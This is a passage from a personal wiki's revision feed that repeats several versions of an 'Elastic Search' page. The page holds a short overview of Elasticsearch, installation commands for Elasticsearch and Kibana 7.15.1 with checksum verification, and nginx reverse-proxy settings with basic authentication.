Elasticsearch can be used to search all kinds of documents. It provides scalable search, has near real-time search, and supports multitenancy. &amp;quot;Elasticsearch is distributed, which means that indices can be divided into shards and each shard can have zero or more replicas. Each node hosts one or more shards, and acts as a coordinator to delegate operations to the correct shard(s). Rebalancing and routing are done automatically&amp;quot;.[2] Related data is often stored in the same index, which consists of one or more primary shards, and zero or more replica shards. Once an index has been created, the number of primary shards cannot be changed.&lt;br /&gt;
&lt;br /&gt;
Elasticsearch uses Lucene and tries to make all its features available through the JSON and Java API. It supports facetting and percolating, which can be useful for notifying if new documents match for registered queries.&lt;br /&gt;
&lt;br /&gt;
Another feature is called &amp;quot;gateway&amp;quot; and handles the long-term persistence of the index;[6] for example, an index can be recovered from the gateway in the event of a server crash. Elasticsearch supports real-time GET requests, which makes it suitable as a NoSQL datastore, but it lacks distributed transactions.&lt;br /&gt;
&lt;br /&gt;
===Apache Lucene===&lt;br /&gt;
&lt;br /&gt;
===Kibana===&lt;br /&gt;
&lt;br /&gt;
===NoSQL===&lt;br /&gt;
&lt;br /&gt;
=ElasticSearch Quick Notes=&lt;br /&gt;
==Installation==&lt;br /&gt;
elesticsearch installation : https://www.elastic.co/guide/en/elasticsearch/reference/current/targz.html&lt;br /&gt;
&lt;br /&gt;
&amp;lt;source&amp;gt;&lt;br /&gt;
# wget https://artifacts.elastic.co/downloads/elasticsearch/elasticsearch-7.15.1-linux-x86_64.tar.gz&lt;br /&gt;
# wget https://artifacts.elastic.co/downloads/elasticsearch/elasticsearch-7.15.1-linux-x86_64.tar.gz.sha512&lt;br /&gt;
# shasum -a 512 -c elasticsearch-7.15.1-linux-x86_64.tar.gz.sha512&lt;br /&gt;
# tar -xzf elasticsearch-7.15.1-linux-x86_64.tar.gz&lt;br /&gt;
# cd elasticsearch-7.15.1/&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Enable automatic creation of system indicesedit&lt;br /&gt;
action.auto_create_index: .monitoring*,.watches,.triggered_watches,.watcher-history*,.ml*&lt;br /&gt;
*  &amp;gt; you may consider setting the value to * which will allow automatic creation of all indices.&lt;br /&gt;
&lt;br /&gt;
&amp;#039;&amp;#039;&amp;#039;Running Elasticsearch from the command line&amp;#039;&amp;#039;&amp;#039;&lt;br /&gt;
&amp;lt;source&amp;gt;&lt;br /&gt;
# ./bin/elasticsearch&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Test elasticsearch installation&lt;br /&gt;
&amp;lt;source&amp;gt;&lt;br /&gt;
# curl -X GET &amp;quot;localhost:9200/?pretty&amp;quot;&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Running as a daemon&lt;br /&gt;
&amp;lt;source&amp;gt;&lt;br /&gt;
# ./bin/elasticsearch -d -p pid&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;source&amp;gt;&lt;br /&gt;
# pkill -F pid&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
https://www.elastic.co/blog/running-elasticsearch-on-aws&lt;br /&gt;
&lt;br /&gt;
=Kibana Quick Notes=&lt;br /&gt;
==Installation==&lt;br /&gt;
&lt;br /&gt;
https://www.elastic.co/guide/en/kibana/current/targz.html&lt;br /&gt;
&lt;br /&gt;
&amp;lt;source&amp;gt;&lt;br /&gt;
# curl -O https://artifacts.elastic.co/downloads/kibana/kibana-7.15.1-linux-x86_64.tar.gz&lt;br /&gt;
# curl https://artifacts.elastic.co/downloads/kibana/kibana-7.15.1-linux-x86_64.tar.gz.sha512 | shasum -a 512 -c -&lt;br /&gt;
# tar -xzf kibana-7.15.1-linux-x86_64.tar.gz&lt;br /&gt;
# cd kibana-7.15.1-linux-x86_64/&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
start kibana&lt;br /&gt;
&amp;lt;source&amp;gt;&lt;br /&gt;
# ./bin/kibana&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
https://www.elastic.co/guide/en/kibana/current/start-stop.html&lt;br /&gt;
&lt;br /&gt;
=NGINX Quick Notes=&lt;br /&gt;
==Installation==&lt;br /&gt;
resource:&lt;br /&gt;
* https://blog.ruanbekker.com/blog/2017/09/16/nginx-reverse-proxy-for-elasticsearch-and-kibana-5-on-aws/ **&lt;br /&gt;
* https://burnhamforensics.com/2019/02/06/how-to-install-and-configure-nginx-for-kibana/&lt;br /&gt;
* https://www.cyberciti.biz/faq/amazon-linux-ami-install-linux-nginx-mysql-php-lemp/&lt;br /&gt;
&lt;br /&gt;
&amp;#039;&amp;#039;&amp;#039;nginx settings&amp;#039;&amp;#039;&amp;#039;&lt;br /&gt;
to add server based auth:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;source&amp;gt;&lt;br /&gt;
# echo &amp;quot;kibanaadmin:`openssl passwd -apr1`&amp;quot; | sudo tee -a /etc/nginx/htpasswd.users&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
it will ask password, save it&lt;br /&gt;
&lt;br /&gt;
create a file. i.e. kibana.conf under /etc/nginx/conf.d/ with the following conf:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;source&amp;gt;&lt;br /&gt;
server {&lt;br /&gt;
    listen 80;&lt;br /&gt;
&lt;br /&gt;
    server_name {{IP-or-DNS}}; # i.e. 217.138.24.32&lt;br /&gt;
&lt;br /&gt;
    auth_basic &amp;quot;Restricted Access&amp;quot;;&lt;br /&gt;
    auth_basic_user_file /etc/nginx/htpasswd.users;&lt;br /&gt;
&lt;br /&gt;
    location / {&lt;br /&gt;
        proxy_pass http://localhost:5601;&lt;br /&gt;
        proxy_http_version 1.1;&lt;br /&gt;
        proxy_set_header Upgrade $http_upgrade;&lt;br /&gt;
        proxy_set_header Connection &amp;#039;upgrade&amp;#039;;&lt;br /&gt;
        proxy_set_header Host $host;&lt;br /&gt;
        proxy_cache_bypass $http_upgrade;&lt;br /&gt;
    }&lt;br /&gt;
}&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
create a file. i.e. elasticsearch.conf under /etc/nginx/conf.d/ with the following conf:&lt;br /&gt;
&amp;lt;source&amp;gt;&lt;br /&gt;
server {&lt;br /&gt;
    listen 81;&lt;br /&gt;
&lt;br /&gt;
    server_name {{IP-or-DNS}}; # i.e. 217.138.24.32&lt;br /&gt;
&lt;br /&gt;
    auth_basic &amp;quot;Restricted Access&amp;quot;;&lt;br /&gt;
    auth_basic_user_file /etc/nginx/htpasswd.users;&lt;br /&gt;
&lt;br /&gt;
    location / {&lt;br /&gt;
        proxy_pass http://localhost:9200;&lt;br /&gt;
        proxy_http_version 1.1;&lt;br /&gt;
        proxy_set_header Upgrade $http_upgrade;&lt;br /&gt;
        proxy_set_header Connection &amp;#039;upgrade&amp;#039;;&lt;br /&gt;
        proxy_set_header Host $host;&lt;br /&gt;
        proxy_cache_bypass $http_upgrade;&lt;br /&gt;
    }&lt;br /&gt;
}&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
nginx start/stop&lt;/div&gt;</summary>
		<author><name>Rasimsen</name></author>
		
	</entry>
	<entry>
		<id>http://rasimsen.com/index.php?title=Elastic_Search&amp;diff=1116</id>
		<title>Elastic Search</title>
		<link rel="alternate" type="text/html" href="http://rasimsen.com/index.php?title=Elastic_Search&amp;diff=1116"/>
		<updated>2021-10-27T16:17:01Z</updated>

		<summary type="html">&lt;p&gt;Rasimsen: /* NGINX Quick Notes */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Elasticsearch is a search engine based on Lucene. It provides a distributed, multitenant-capable full-text search engine with an HTTP web interface and schema-free JSON documents. Elasticsearch is developed in Java and is released as open source under the terms of the Apache License. Official clients are available in Java, .NET (C#), PHP, Python, Apache Groovy, Ruby and many other languages.[2] According to the DB-Engines ranking, Elasticsearch is the most popular enterprise search engine followed by Apache Solr, also based on Lucene.&lt;br /&gt;
&lt;br /&gt;
Elasticsearch is developed alongside a data-collection and log-parsing engine called Logstash, and an analytics and visualisation platform called Kibana. The three products are designed for use as an integrated solution, referred to as the &amp;quot;Elastic Stack&amp;quot; (formerly the &amp;quot;ELK stack&amp;quot;).&lt;br /&gt;
&lt;br /&gt;
Elasticsearch can be used to search all kinds of documents. It provides scalable search, has near real-time search, and supports multitenancy. &amp;quot;Elasticsearch is distributed, which means that indices can be divided into shards and each shard can have zero or more replicas. Each node hosts one or more shards, and acts as a coordinator to delegate operations to the correct shard(s). Rebalancing and routing are done automatically&amp;quot;.[2] Related data is often stored in the same index, which consists of one or more primary shards, and zero or more replica shards. Once an index has been created, the number of primary shards cannot be changed.&lt;br /&gt;
&lt;br /&gt;
Elasticsearch uses Lucene and tries to make all its features available through the JSON and Java API. It supports facetting and percolating, which can be useful for notifying if new documents match for registered queries.&lt;br /&gt;
&lt;br /&gt;
Another feature is called &amp;quot;gateway&amp;quot; and handles the long-term persistence of the index;[6] for example, an index can be recovered from the gateway in the event of a server crash. Elasticsearch supports real-time GET requests, which makes it suitable as a NoSQL datastore, but it lacks distributed transactions.&lt;br /&gt;
&lt;br /&gt;
===Apache Lucene===&lt;br /&gt;
&lt;br /&gt;
===Kibana===&lt;br /&gt;
&lt;br /&gt;
===NoSQL===&lt;br /&gt;
&lt;br /&gt;
=ElasticSearch Quick Notes=&lt;br /&gt;
==Installation==&lt;br /&gt;
elesticsearch installation : https://www.elastic.co/guide/en/elasticsearch/reference/current/targz.html&lt;br /&gt;
&lt;br /&gt;
&amp;lt;source&amp;gt;&lt;br /&gt;
# wget https://artifacts.elastic.co/downloads/elasticsearch/elasticsearch-7.15.1-linux-x86_64.tar.gz&lt;br /&gt;
# wget https://artifacts.elastic.co/downloads/elasticsearch/elasticsearch-7.15.1-linux-x86_64.tar.gz.sha512&lt;br /&gt;
# shasum -a 512 -c elasticsearch-7.15.1-linux-x86_64.tar.gz.sha512&lt;br /&gt;
# tar -xzf elasticsearch-7.15.1-linux-x86_64.tar.gz&lt;br /&gt;
# cd elasticsearch-7.15.1/&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Enable automatic creation of system indicesedit&lt;br /&gt;
action.auto_create_index: .monitoring*,.watches,.triggered_watches,.watcher-history*,.ml*&lt;br /&gt;
*  &amp;gt; you may consider setting the value to * which will allow automatic creation of all indices.&lt;br /&gt;
&lt;br /&gt;
&amp;#039;&amp;#039;&amp;#039;Running Elasticsearch from the command line&amp;#039;&amp;#039;&amp;#039;&lt;br /&gt;
&amp;lt;source&amp;gt;&lt;br /&gt;
# ./bin/elasticsearch&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Test elasticsearch installation&lt;br /&gt;
&amp;lt;source&amp;gt;&lt;br /&gt;
# curl -X GET &amp;quot;localhost:9200/?pretty&amp;quot;&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Running as a daemon&lt;br /&gt;
&amp;lt;source&amp;gt;&lt;br /&gt;
# ./bin/elasticsearch -d -p pid&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;source&amp;gt;&lt;br /&gt;
# pkill -F pid&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
https://www.elastic.co/blog/running-elasticsearch-on-aws&lt;br /&gt;
&lt;br /&gt;
=Kibana Quick Notes=&lt;br /&gt;
==Installation==&lt;br /&gt;
&lt;br /&gt;
https://www.elastic.co/guide/en/kibana/current/targz.html&lt;br /&gt;
&lt;br /&gt;
&amp;lt;source&amp;gt;&lt;br /&gt;
# curl -O https://artifacts.elastic.co/downloads/kibana/kibana-7.15.1-linux-x86_64.tar.gz&lt;br /&gt;
# curl https://artifacts.elastic.co/downloads/kibana/kibana-7.15.1-linux-x86_64.tar.gz.sha512 | shasum -a 512 -c -&lt;br /&gt;
# tar -xzf kibana-7.15.1-linux-x86_64.tar.gz&lt;br /&gt;
# cd kibana-7.15.1-linux-x86_64/&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
start kibana&lt;br /&gt;
&amp;lt;source&amp;gt;&lt;br /&gt;
# ./bin/kibana&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
https://www.elastic.co/guide/en/kibana/current/start-stop.html&lt;br /&gt;
&lt;br /&gt;
=NGINX Quick Notes=&lt;br /&gt;
==Installation==&lt;br /&gt;
resource:&lt;br /&gt;
* https://blog.ruanbekker.com/blog/2017/09/16/nginx-reverse-proxy-for-elasticsearch-and-kibana-5-on-aws/ **&lt;br /&gt;
* https://burnhamforensics.com/2019/02/06/how-to-install-and-configure-nginx-for-kibana/&lt;br /&gt;
* https://www.cyberciti.biz/faq/amazon-linux-ami-install-linux-nginx-mysql-php-lemp/&lt;br /&gt;
&lt;br /&gt;
&amp;#039;&amp;#039;&amp;#039;nginx settings&amp;#039;&amp;#039;&amp;#039;&lt;br /&gt;
to add server based auth:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;source&amp;gt;&lt;br /&gt;
# echo &amp;quot;kibanaadmin:`openssl passwd -apr1`&amp;quot; | sudo tee -a /etc/nginx/htpasswd.users&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
it will ask password, save it&lt;br /&gt;
&lt;br /&gt;
create a file. i.e. kibana.conf under /etc/nginx/conf.d/ with the following conf:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;source&amp;gt;&lt;br /&gt;
server {&lt;br /&gt;
    listen 80;&lt;br /&gt;
&lt;br /&gt;
    server_name {{IP-or-DNS}}; # i.e. 217.138.24.32&lt;br /&gt;
&lt;br /&gt;
    auth_basic &amp;quot;Restricted Access&amp;quot;;&lt;br /&gt;
    auth_basic_user_file /etc/nginx/htpasswd.users;&lt;br /&gt;
&lt;br /&gt;
    location / {&lt;br /&gt;
        proxy_pass http://localhost:5601;&lt;br /&gt;
        proxy_http_version 1.1;&lt;br /&gt;
        proxy_set_header Upgrade $http_upgrade;&lt;br /&gt;
        proxy_set_header Connection &amp;#039;upgrade&amp;#039;;&lt;br /&gt;
        proxy_set_header Host $host;&lt;br /&gt;
        proxy_cache_bypass $http_upgrade;&lt;br /&gt;
    }&lt;br /&gt;
}&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;/div&gt;</summary>
		<author><name>Rasimsen</name></author>
		
	</entry>
	<entry>
		<id>http://rasimsen.com/index.php?title=Elastic_Search&amp;diff=1115</id>
		<title>Elastic Search</title>
		<link rel="alternate" type="text/html" href="http://rasimsen.com/index.php?title=Elastic_Search&amp;diff=1115"/>
		<updated>2021-10-27T16:16:16Z</updated>

		<summary type="html">&lt;p&gt;Rasimsen: /* NGINX Quick Notes */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Elasticsearch is a search engine based on Lucene. It provides a distributed, multitenant-capable full-text search engine with an HTTP web interface and schema-free JSON documents. Elasticsearch is developed in Java and is released as open source under the terms of the Apache License. Official clients are available in Java, .NET (C#), PHP, Python, Apache Groovy, Ruby and many other languages.[2] According to the DB-Engines ranking, Elasticsearch is the most popular enterprise search engine followed by Apache Solr, also based on Lucene.&lt;br /&gt;
&lt;br /&gt;
Elasticsearch is developed alongside a data-collection and log-parsing engine called Logstash, and an analytics and visualisation platform called Kibana. The three products are designed for use as an integrated solution, referred to as the &amp;quot;Elastic Stack&amp;quot; (formerly the &amp;quot;ELK stack&amp;quot;).&lt;br /&gt;
&lt;br /&gt;
Elasticsearch can be used to search all kinds of documents. It provides scalable search, has near real-time search, and supports multitenancy. &amp;quot;Elasticsearch is distributed, which means that indices can be divided into shards and each shard can have zero or more replicas. Each node hosts one or more shards, and acts as a coordinator to delegate operations to the correct shard(s). Rebalancing and routing are done automatically&amp;quot;.[2] Related data is often stored in the same index, which consists of one or more primary shards, and zero or more replica shards. Once an index has been created, the number of primary shards cannot be changed.&lt;br /&gt;
&lt;br /&gt;
Elasticsearch uses Lucene and tries to make all its features available through the JSON and Java API. It supports facetting and percolating, which can be useful for notifying if new documents match for registered queries.&lt;br /&gt;
&lt;br /&gt;
Another feature is called &amp;quot;gateway&amp;quot; and handles the long-term persistence of the index;[6] for example, an index can be recovered from the gateway in the event of a server crash. Elasticsearch supports real-time GET requests, which makes it suitable as a NoSQL datastore, but it lacks distributed transactions.&lt;br /&gt;
&lt;br /&gt;
===Apache Lucene===&lt;br /&gt;
&lt;br /&gt;
===Kibana===&lt;br /&gt;
&lt;br /&gt;
===NoSQL===&lt;br /&gt;
&lt;br /&gt;
=ElasticSearch Quick Notes=&lt;br /&gt;
==Installation==&lt;br /&gt;
elesticsearch installation : https://www.elastic.co/guide/en/elasticsearch/reference/current/targz.html&lt;br /&gt;
&lt;br /&gt;
&amp;lt;source&amp;gt;&lt;br /&gt;
# wget https://artifacts.elastic.co/downloads/elasticsearch/elasticsearch-7.15.1-linux-x86_64.tar.gz&lt;br /&gt;
# wget https://artifacts.elastic.co/downloads/elasticsearch/elasticsearch-7.15.1-linux-x86_64.tar.gz.sha512&lt;br /&gt;
# shasum -a 512 -c elasticsearch-7.15.1-linux-x86_64.tar.gz.sha512&lt;br /&gt;
# tar -xzf elasticsearch-7.15.1-linux-x86_64.tar.gz&lt;br /&gt;
# cd elasticsearch-7.15.1/&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Enable automatic creation of system indicesedit&lt;br /&gt;
action.auto_create_index: .monitoring*,.watches,.triggered_watches,.watcher-history*,.ml*&lt;br /&gt;
*  &amp;gt; you may consider setting the value to * which will allow automatic creation of all indices.&lt;br /&gt;
&lt;br /&gt;
&amp;#039;&amp;#039;&amp;#039;Running Elasticsearch from the command line&amp;#039;&amp;#039;&amp;#039;&lt;br /&gt;
&amp;lt;source&amp;gt;&lt;br /&gt;
# ./bin/elasticsearch&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Test elasticsearch installation&lt;br /&gt;
&amp;lt;source&amp;gt;&lt;br /&gt;
# curl -X GET &amp;quot;localhost:9200/?pretty&amp;quot;&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Running as a daemon&lt;br /&gt;
&amp;lt;source&amp;gt;&lt;br /&gt;
# ./bin/elasticsearch -d -p pid&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;source&amp;gt;&lt;br /&gt;
# pkill -F pid&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
https://www.elastic.co/blog/running-elasticsearch-on-aws&lt;br /&gt;
&lt;br /&gt;
=Kibana Quick Notes=&lt;br /&gt;
==Installation==&lt;br /&gt;
&lt;br /&gt;
https://www.elastic.co/guide/en/kibana/current/targz.html&lt;br /&gt;
&lt;br /&gt;
&amp;lt;source&amp;gt;&lt;br /&gt;
# curl -O https://artifacts.elastic.co/downloads/kibana/kibana-7.15.1-linux-x86_64.tar.gz&lt;br /&gt;
# curl https://artifacts.elastic.co/downloads/kibana/kibana-7.15.1-linux-x86_64.tar.gz.sha512 | shasum -a 512 -c -&lt;br /&gt;
# tar -xzf kibana-7.15.1-linux-x86_64.tar.gz&lt;br /&gt;
# cd kibana-7.15.1-linux-x86_64/&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
start kibana&lt;br /&gt;
&amp;lt;source&amp;gt;&lt;br /&gt;
# ./bin/kibana&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
https://www.elastic.co/guide/en/kibana/current/start-stop.html&lt;br /&gt;
&lt;br /&gt;
=NGINX Quick Notes=&lt;br /&gt;
==Installation==&lt;br /&gt;
resource:&lt;br /&gt;
* https://blog.ruanbekker.com/blog/2017/09/16/nginx-reverse-proxy-for-elasticsearch-and-kibana-5-on-aws/ **&lt;br /&gt;
* https://burnhamforensics.com/2019/02/06/how-to-install-and-configure-nginx-for-kibana/&lt;br /&gt;
* https://www.cyberciti.biz/faq/amazon-linux-ami-install-linux-nginx-mysql-php-lemp/&lt;br /&gt;
&lt;br /&gt;
&amp;#039;&amp;#039;&amp;#039;nginx settings&amp;#039;&amp;#039;&amp;#039;&lt;br /&gt;
to add server based auth:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;source&amp;gt;&lt;br /&gt;
# echo &amp;quot;kibanaadmin:`openssl passwd -apr1`&amp;quot; | sudo tee -a /etc/nginx/htpasswd.users&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
it will ask password, save it&lt;br /&gt;
&lt;br /&gt;
create a file. i.e. kibana.conf&lt;br /&gt;
&lt;br /&gt;
&amp;lt;source&amp;gt;&lt;br /&gt;
server {&lt;br /&gt;
    listen 80;&lt;br /&gt;
&lt;br /&gt;
    server_name {{IP-or-DNS}}; # i.e. 217.138.24.32&lt;br /&gt;
&lt;br /&gt;
    auth_basic &amp;quot;Restricted Access&amp;quot;;&lt;br /&gt;
    auth_basic_user_file /etc/nginx/htpasswd.users;&lt;br /&gt;
&lt;br /&gt;
    location / {&lt;br /&gt;
        proxy_pass http://localhost:5601;&lt;br /&gt;
        proxy_http_version 1.1;&lt;br /&gt;
        proxy_set_header Upgrade $http_upgrade;&lt;br /&gt;
        proxy_set_header Connection &amp;#039;upgrade&amp;#039;;&lt;br /&gt;
        proxy_set_header Host $host;&lt;br /&gt;
        proxy_cache_bypass $http_upgrade;&lt;br /&gt;
    }&lt;br /&gt;
}&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;/div&gt;</summary>
		<author><name>Rasimsen</name></author>
		
	</entry>
	<entry>
		<id>http://rasimsen.com/index.php?title=Elastic_Search&amp;diff=1114</id>
		<title>Elastic Search</title>
		<link rel="alternate" type="text/html" href="http://rasimsen.com/index.php?title=Elastic_Search&amp;diff=1114"/>
		<updated>2021-10-27T16:16:03Z</updated>

		<summary type="html">&lt;p&gt;Rasimsen: /* NGINX Quick Notes */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Elasticsearch is a search engine based on Lucene. It provides a distributed, multitenant-capable full-text search engine with an HTTP web interface and schema-free JSON documents. Elasticsearch is developed in Java and is released as open source under the terms of the Apache License. Official clients are available in Java, .NET (C#), PHP, Python, Apache Groovy, Ruby and many other languages.[2] According to the DB-Engines ranking, Elasticsearch is the most popular enterprise search engine followed by Apache Solr, also based on Lucene.&lt;br /&gt;
&lt;br /&gt;
Elasticsearch is developed alongside a data-collection and log-parsing engine called Logstash, and an analytics and visualisation platform called Kibana. The three products are designed for use as an integrated solution, referred to as the &amp;quot;Elastic Stack&amp;quot; (formerly the &amp;quot;ELK stack&amp;quot;).&lt;br /&gt;
&lt;br /&gt;
Elasticsearch can be used to search all kinds of documents. It provides scalable search, has near real-time search, and supports multitenancy. &amp;quot;Elasticsearch is distributed, which means that indices can be divided into shards and each shard can have zero or more replicas. Each node hosts one or more shards, and acts as a coordinator to delegate operations to the correct shard(s). Rebalancing and routing are done automatically&amp;quot;.[2] Related data is often stored in the same index, which consists of one or more primary shards, and zero or more replica shards. Once an index has been created, the number of primary shards cannot be changed.&lt;br /&gt;
&lt;br /&gt;
Elasticsearch uses Lucene and tries to make all its features available through the JSON and Java API. It supports facetting and percolating, which can be useful for notifying if new documents match for registered queries.&lt;br /&gt;
&lt;br /&gt;
Another feature is called &amp;quot;gateway&amp;quot; and handles the long-term persistence of the index;[6] for example, an index can be recovered from the gateway in the event of a server crash. Elasticsearch supports real-time GET requests, which makes it suitable as a NoSQL datastore, but it lacks distributed transactions.&lt;br /&gt;
&lt;br /&gt;
===Apache Lucene===&lt;br /&gt;
&lt;br /&gt;
===Kibana===&lt;br /&gt;
&lt;br /&gt;
===NoSQL===&lt;br /&gt;
&lt;br /&gt;
=ElasticSearch Quick Notes=&lt;br /&gt;
==Installation==&lt;br /&gt;
elesticsearch installation : https://www.elastic.co/guide/en/elasticsearch/reference/current/targz.html&lt;br /&gt;
&lt;br /&gt;
&amp;lt;source&amp;gt;&lt;br /&gt;
# wget https://artifacts.elastic.co/downloads/elasticsearch/elasticsearch-7.15.1-linux-x86_64.tar.gz&lt;br /&gt;
# wget https://artifacts.elastic.co/downloads/elasticsearch/elasticsearch-7.15.1-linux-x86_64.tar.gz.sha512&lt;br /&gt;
# shasum -a 512 -c elasticsearch-7.15.1-linux-x86_64.tar.gz.sha512&lt;br /&gt;
# tar -xzf elasticsearch-7.15.1-linux-x86_64.tar.gz&lt;br /&gt;
# cd elasticsearch-7.15.1/&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Enable automatic creation of system indicesedit&lt;br /&gt;
action.auto_create_index: .monitoring*,.watches,.triggered_watches,.watcher-history*,.ml*&lt;br /&gt;
*  &amp;gt; you may consider setting the value to * which will allow automatic creation of all indices.&lt;br /&gt;
&lt;br /&gt;
&amp;#039;&amp;#039;&amp;#039;Running Elasticsearch from the command line&amp;#039;&amp;#039;&amp;#039;&lt;br /&gt;
&amp;lt;source&amp;gt;&lt;br /&gt;
# ./bin/elasticsearch&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Test elasticsearch installation&lt;br /&gt;
&amp;lt;source&amp;gt;&lt;br /&gt;
# curl -X GET &amp;quot;localhost:9200/?pretty&amp;quot;&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Running as a daemon&lt;br /&gt;
&amp;lt;source&amp;gt;&lt;br /&gt;
# ./bin/elasticsearch -d -p pid&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;source&amp;gt;&lt;br /&gt;
# pkill -F pid&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
https://www.elastic.co/blog/running-elasticsearch-on-aws&lt;br /&gt;
&lt;br /&gt;
=Kibana Quick Notes=&lt;br /&gt;
==Installation==&lt;br /&gt;
&lt;br /&gt;
https://www.elastic.co/guide/en/kibana/current/targz.html&lt;br /&gt;
&lt;br /&gt;
&amp;lt;source&amp;gt;&lt;br /&gt;
# curl -O https://artifacts.elastic.co/downloads/kibana/kibana-7.15.1-linux-x86_64.tar.gz&lt;br /&gt;
# curl https://artifacts.elastic.co/downloads/kibana/kibana-7.15.1-linux-x86_64.tar.gz.sha512 | shasum -a 512 -c -&lt;br /&gt;
# tar -xzf kibana-7.15.1-linux-x86_64.tar.gz&lt;br /&gt;
# cd kibana-7.15.1-linux-x86_64/&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
start kibana&lt;br /&gt;
&amp;lt;source&amp;gt;&lt;br /&gt;
# ./bin/kibana&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
https://www.elastic.co/guide/en/kibana/current/start-stop.html&lt;br /&gt;
&lt;br /&gt;
=NGINX Quick Notes=&lt;br /&gt;
==Installation==&lt;br /&gt;
resource:&lt;br /&gt;
* https://blog.ruanbekker.com/blog/2017/09/16/nginx-reverse-proxy-for-elasticsearch-and-kibana-5-on-aws/ **&lt;br /&gt;
* https://burnhamforensics.com/2019/02/06/how-to-install-and-configure-nginx-for-kibana/&lt;br /&gt;
* https://www.cyberciti.biz/faq/amazon-linux-ami-install-linux-nginx-mysql-php-lemp/&lt;br /&gt;
&lt;br /&gt;
&amp;#039;&amp;#039;&amp;#039;nginx settings&amp;#039;&amp;#039;&amp;#039;&lt;br /&gt;
to add server based auth:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;source&amp;gt;&lt;br /&gt;
# echo &amp;quot;kibanaadmin:`openssl passwd -apr1`&amp;quot; | sudo tee -a /etc/nginx/htpasswd.users&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
it will ask password, save it&lt;br /&gt;
&lt;br /&gt;
create a file. i.e. kibana.conf&lt;/div&gt;</summary>
		<author><name>Rasimsen</name></author>
		
	</entry>
	<entry>
		<id>http://rasimsen.com/index.php?title=Elastic_Search&amp;diff=1113</id>
		<title>Elastic Search</title>
		<link rel="alternate" type="text/html" href="http://rasimsen.com/index.php?title=Elastic_Search&amp;diff=1113"/>
		<updated>2021-10-27T16:11:20Z</updated>

		<summary type="html">&lt;p&gt;Rasimsen: /* NGINX Quick Notes */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Elasticsearch is a search engine based on Lucene. It provides a distributed, multitenant-capable full-text search engine with an HTTP web interface and schema-free JSON documents. Elasticsearch is developed in Java and is released as open source under the terms of the Apache License. Official clients are available in Java, .NET (C#), PHP, Python, Apache Groovy, Ruby and many other languages.[2] According to the DB-Engines ranking, Elasticsearch is the most popular enterprise search engine followed by Apache Solr, also based on Lucene.&lt;br /&gt;
&lt;br /&gt;
Elasticsearch is developed alongside a data-collection and log-parsing engine called Logstash, and an analytics and visualisation platform called Kibana. The three products are designed for use as an integrated solution, referred to as the &amp;quot;Elastic Stack&amp;quot; (formerly the &amp;quot;ELK stack&amp;quot;).&lt;br /&gt;
&lt;br /&gt;
